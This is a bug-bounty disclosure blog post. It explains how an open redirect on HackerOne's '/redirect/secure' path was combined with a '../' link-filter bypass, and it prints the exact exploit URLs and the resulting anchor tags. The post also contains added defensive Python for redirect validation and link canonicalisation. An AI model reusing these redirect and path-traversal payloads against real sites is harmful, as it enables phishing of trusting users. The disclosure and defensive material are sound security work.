Pranav Hivarekar's Security Blog

REST-API Lover | Security Researcher | API Coder | Ambivert | GET /noob


HackerOne Bug - Redirect Filter Bypass and Open Redirector

What is an Open Redirector?

An Open Redirect vulnerability lets an attacker make a web application send its users to an arbitrary external site: the application takes the destination from a request parameter and redirects to it without validating that input. It is mainly used in phishing attacks, since the link starts with a trusted domain.

e.g. http://site.com/redirect.php?url=http://evil.com/

Here, if the 'url' parameter is not validated, the page redirects to 'http://evil.com/'. That is an 'Open Redirector'.
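As an added example (not code from the original post), here is the kind of check a redirect endpoint like the 'redirect.php' above should apply to its 'url' parameter before issuing the redirect. The allowlist of hosts ('site.com') and the fallback path are assumptions for the example; the sample inputs are constructed.

```python
from urllib.parse import urlsplit

# Assumptions for this example: the site's own hosts and a safe landing page.
ALLOWED_HOSTS = {"site.com", "www.site.com"}
SAFE_FALLBACK = "/"


def safe_redirect_target(url, allowed_hosts=frozenset(ALLOWED_HOSTS)):
    """Return `url` if it is safe to redirect to, otherwise SAFE_FALLBACK.

    Safe means: an absolute http(s) URL whose host is on the allowlist, or a
    site-relative path.  Everything else (other hosts, other schemes,
    protocol-relative '//host', header-injection characters) is refused.
    """
    if not url or any(ch in url for ch in "\\\r\n\t "):
        # Browsers treat a backslash as a slash ('/\evil.com' becomes
        # '//evil.com'); CR/LF/whitespace have no place in a Location header.
        return SAFE_FALLBACK
    parts = urlsplit(url)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return SAFE_FALLBACK  # javascript:, data:, file:, ...
        # .hostname drops userinfo and port, so 'http://site.com@evil.com'
        # is judged by its real host, evil.com.
        host = (parts.hostname or "").lower()
        return url if host in allowed_hosts else SAFE_FALLBACK
    # No scheme: accept only a site-relative path, never '//evil.com'.
    if parts.netloc or not url.startswith("/") or url.startswith("//"):
        return SAFE_FALLBACK
    return url


if __name__ == "__main__":
    # Constructed sample values of the 'url' parameter, legitimate and not.
    samples = [
        "http://site.com/dashboard",
        "/account/settings",
        "http://evil.com/",
        "//evil.com/",
        "http://site.com@evil.com/",
        "http://site.com.evil.com/",
        "javascript:alert(1)",
        "/\\evil.com",
    ]
    for s in samples:
        print("%-30s -> %s" % (s, safe_redirect_target(s)))
```

The decision is made on the parsed host, not on a string prefix: 'http://site.com.evil.com' and 'http://site.com@evil.com' both start with the trusted name yet land on evil.com. A signature on the redirect link, as in the HackerOne links later in this post, only shows who generated the link; the endpoint still has to decide where it is willing to send the browser.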

Open Redirector on HackerOne

HackerOne recently made a few changes. When an external link is posted in a report or as a comment, clicking it first leads to an 'External link warning' page; after clicking 'Proceed', the user is sent on to the external link.
e.g. https://hackerone.com/redirect?signature=0030f1548bef809f5c6344a14559c98ec48213d2&url=http%3A%2F%2Fwww.google.com%2F

[Image: the 'External link warning' page]

Now, a small change to the link's path turned it into an 'Open Redirector':

https://hackerone.com/redirect/secure?signature=0030f1548bef809f5c6344a14559c98ec48213d2&url=http%3A%2F%2Fwww.google.com%2F

I reported this, but the HackerOne team said,

[Image: the HackerOne team's reply to the report]

Then I went to work on the 'Redirect Filter'.

Redirect Filter Bypass

While working on it, I found that when a user posts an internal link, i.e. 'https://hackerone.com', it is placed in an anchor tag as follows:

<a href="https://hackerone.com" title="https://hackerone.com">https://hackerone.com</a>

If a user posts an external link, i.e. 'http://google.com', it is also placed in an anchor tag, as follows:

<a href="/redirect?signature=0030f1548bef809f5c6344a14559c98ec48213d2&amp;url=http%3A%2F%2Fwww.google.com%2F" target="_blank" title="http://www.google.com">http://www.google.com</a>

Note the '/redirect' prefix: that is the 'Redirect Filter'.

Then I started playing with '/redirect'. In the end, I found that adding '../' to the link bypassed the 'Redirect Filter', i.e. 'https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&url=http%3A%2F%2Fwww.google.com'.
This was placed in an anchor tag as follows:

<a href="https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com" title="https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com">https://hackerone.com/../redirect/?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com</a>

Here the filter was bypassed: the link was treated as internal and left as-is, but the browser resolves the '../' and requests '/redirect/...' on hackerone.com.

Final Exploit

The exploit should work against any HackerOne user. So I combined the 'Open Redirector' and the 'Redirect Filter Bypass' into one exploit that affects other users.

I posted the link 'https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&url=http%3A%2F%2Fwww.google.com'. It was placed in an anchor tag as follows:

<a href="https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com" title="https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com">https://hackerone.com/../redirect/secure?signature=43cd652c2f1835df993825d00bed0660f498fc42&amp;url=http%3A%2F%2Fwww.google.com</a>

This not only bypassed the 'Redirect Filter' but also redirected users to an external site. The HackerOne team resolved the issue within a few working days and rewarded me for it.
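The filter bypass and the final exploit both rest on the same mismatch: the filter judged the posted text to be internal because it began with 'https://hackerone.com', while the browser resolved the '../' and requested '/redirect/...'. The following Python is an added example, not HackerOne's code, of a link filter that classifies on the browser-resolved URL and never counts the redirect endpoint itself as internal. The HMAC key, the SHA-256 signature, the plain prefix check shown for contrast, and the SITE_HOST/REDIRECT_PATH constants are assumptions for the example; the post does not describe the real signature scheme or filter logic.

```python
import hashlib
import hmac
from html import escape
from urllib.parse import urlencode, urlsplit

SITE_HOST = "hackerone.com"              # host the filter treats as internal (assumed)
REDIRECT_PATH = "/redirect"              # the interstitial endpoint seen in the post
SECRET = b"constructed-example-secret"   # assumption: the real key lives in server config

DOT = {".", "%2e"}                            # single-dot segments, incl. encoded form
DOTDOT = {"..", ".%2e", "%2e.", "%2e%2e"}     # double-dot segments, incl. encoded forms


def remove_dot_segments(path):
    """Collapse '.' and '..' (and their percent-encoded spellings) the way a
    browser does before sending the request, so '/../redirect/' -> '/redirect/'."""
    out = []
    for seg in path.replace("\\", "/").split("/")[1:]:   # browsers treat '\' as '/'
        low = seg.lower()
        if low in DOTDOT:
            if out:
                out.pop()
        elif low not in DOT:
            out.append(seg)
    return "/" + "/".join(out)


def canonical_parts(href):
    """(scheme, host, resolved path, query) as the browser will actually request it."""
    p = urlsplit(href.strip())
    return p.scheme.lower(), (p.hostname or "").lower(), remove_dot_segments(p.path or "/"), p.query


def is_internal_naive(href):
    """A plain prefix test, shown only as the kind of check a '../' link slips past."""
    return href.startswith("https://" + SITE_HOST)


def is_internal(href):
    """Classify on the resolved URL; the redirect endpoint is a door to the outside,
    so a link that lands on it is never treated as internal."""
    scheme, host, path, _ = canonical_parts(href)
    if scheme != "https" or host != SITE_HOST:
        return False
    return not (path == REDIRECT_PATH or path.startswith(REDIRECT_PATH + "/"))


def sign(url):
    """Tie the wrapped target to this server so only filter-generated links verify."""
    return hmac.new(SECRET, url.encode(), hashlib.sha256).hexdigest()


def render_link(href):
    """Emit the anchor tag the filter would place in a report or comment."""
    if is_internal(href):
        return '<a href="%s" title="%s">%s</a>' % ((escape(href, quote=True),) * 3)
    wrapped = REDIRECT_PATH + "?" + urlencode({"signature": sign(href), "url": href})
    return '<a href="%s" target="_blank" rel="noopener" title="%s">%s</a>' % (
        escape(wrapped, quote=True), escape(href, quote=True), escape(href))


if __name__ == "__main__":
    # Constructed sample links: a genuine internal one, the post's '../' form,
    # an encoded variant of it, and a plain external link.
    for link in [
        "https://hackerone.com/reports/28865",
        "https://hackerone.com/../redirect/?signature=abc&url=http%3A%2F%2Fwww.google.com",
        "https://hackerone.com/%2E%2E/redirect/secure?signature=abc&url=http%3A%2F%2Fwww.google.com",
        "http://www.google.com",
    ]:
        print("naive=%-5s resolved=%-5s %s" % (is_internal_naive(link), is_internal(link), link))
        print("   ", render_link(link))
```

Two things the resolved check buys: the '../' and '%2E%2E' links are no longer mistaken for internal pages, and a link that resolves to '/redirect' or anything under it is wrapped like any external link instead of being emitted bare. Canonicalising in the filter is a second layer only; the redirect endpoint itself still has to validate its target server-side, since that is where the open redirect in this post actually lived.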

Video Proof Of Concept:

HackerOne Report: https://hackerone.com/reports/28865

I would like to thank Michiel Prins (Co-founder of HackerOne), Jobert Abma (Co-founder of HackerOne) and the whole HackerOne team for their enormous support every time.

Hope you enjoyed this.